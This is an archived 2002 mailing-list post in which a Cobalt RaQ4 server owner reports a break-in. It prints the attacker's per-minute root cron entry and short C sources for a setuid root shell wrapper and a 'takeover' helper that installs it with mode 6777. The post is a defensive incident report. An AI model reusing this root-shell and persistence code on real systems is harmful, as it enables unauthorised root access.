[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-users] RaQ4 Hack - apache NOT fixed! be aware

Subject: [cobalt-users] RaQ4 Hack - apache NOT fixed! be aware
From: "Robin Edgar - Tripany" <red@xxxxxxxxxxx>
Date: Thu Sep 5 16:14:06 2002
List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>

Well, I tried to do this via Sun but they told me the garuantee was out, so
via this channel...

On a happy day I found that this message was being posted about once every
minute:

--------------

Date: Thu, 5 Sep 2002 15:45:01 +0200
From: root (Cron Daemon)
To: root
Subject: Cron <root@raq-042> if [ -x "/tmp/core/own" ] ; then
"/tmp/core/own";
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>

/bin/sh: -c: line 2: syntax error: unexpected end of file

---------------

Now it's not mine, so I was a bit surprised.
In /etc/cron.d I found the following file (core)

------------
*/1 * * * * root if [ -x "/tmp/core/own" ] ; then "/tmp/core/own";
fi
------------

And in /tmp/core I found this:
-------------
drwxr-xr-x   2 httpd    root         1024 Aug 29 20:21 ./
drwxrwxrwt   5 root     root         1024 Sep  6 00:49 ../
-rw-rw-rw-   1 httpd    root           71 Aug 29 20:21 croncore
lrwxrwxrwx   1 httpd    root           16 Sep  6 00:49 gmon.out ->
/etc/cron.d/core
-rwxrwxrwx   1 httpd    root        11912 Aug 29 20:21 own
-rwxrwxrwx   1 httpd    root        12061 Aug 29 20:21 sushi
-rw-rw-rw-   1 httpd    root          150 Aug 29 20:21 sushi.c
-rw-rw-rw-   1 httpd    root           90 Aug 29 20:21 takeover.c
-------------------
sushi.c
----------------
#include <unistd.h>
int main (int argc, char **argv, char **envp) {
    setuid(0);
    setgid(0);
    execve("/bin/sh",argv,envp);
    return -1;
}
-------------------
and takeover.c
------------------
#include <stdlib.h>
main() { system("cp /tmp/core/sushi /.sushi ; chmod 6777 /.sushi"); }
-------------------
Doing straces on the binaries, I found that the 2 binaries are the compiled
files above

Doing some more digging I found
/tmp/.tmp/
drwxr-xr-x   2 httpd    root         1024 Aug 29 20:06 ./
drwxrwxrwt   5 root     root         1024 Sep  6 00:49 ../
-rwxr-xr-x   1 httpd    root        14277 Aug 29 01:28 backlyn
-rw-r--r--   1 httpd    root         1283 Aug 29 01:27 backlyn.c
-rwxr-xr-x   1 httpd    root        14278 Aug 29 01:28 backwget
-rw-r--r--   1 httpd    root         1283 Aug 29 01:27 backwget.c
-rwxr-xr-x   1 httpd    root        14677 Aug 29 01:31 epcs
-rw-r--r--   1 httpd    root         5073 May 14  2001 epcs2.c
-rw-r--r--   1 httpd    root         2916 Aug 29 20:20 raq4lrex.sh
-rwxr-xr-x   1 httpd    root        28449 Aug 29 01:36 red
-rw-r--r--   1 httpd    root        12891 Jun  5  2001 red.c

Now the sources of these are too long to post, so you can get them from me.
Suffice to say, yes it /does/ launch a shell, and also runs raq4lrex.sh as a
daemon.

I haven't figured out how they managed to get the files to /tmp but I know
this is tailored for the RaQ4 (in the sources of one of the above).

Sun refuses to help (thank you oh so much sun), so maybe you can figure it
out. And before you ask, YES, I had fully patched up the machine.

Looks to me like they broke apache, so the 'fix' doesn't really work.
If you want the sources for further examination, please email me, and I'll
send them to you.

Best regards
Robin Edgar
Tripany

Follow-Ups:
- Re: [cobalt-users] RaQ4 Hack - apache NOT fixed! be aware
  - From: Jeff Lasman

Prev by Date: [cobalt-users] Sendmail Problem
Next by Date: Re: [cobalt-users] Sendmail Problem
Previous by thread: Re: [cobalt-users] Starting a web hosting company.
Next by thread: Re: [cobalt-users] RaQ4 Hack - apache NOT fixed! be aware

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index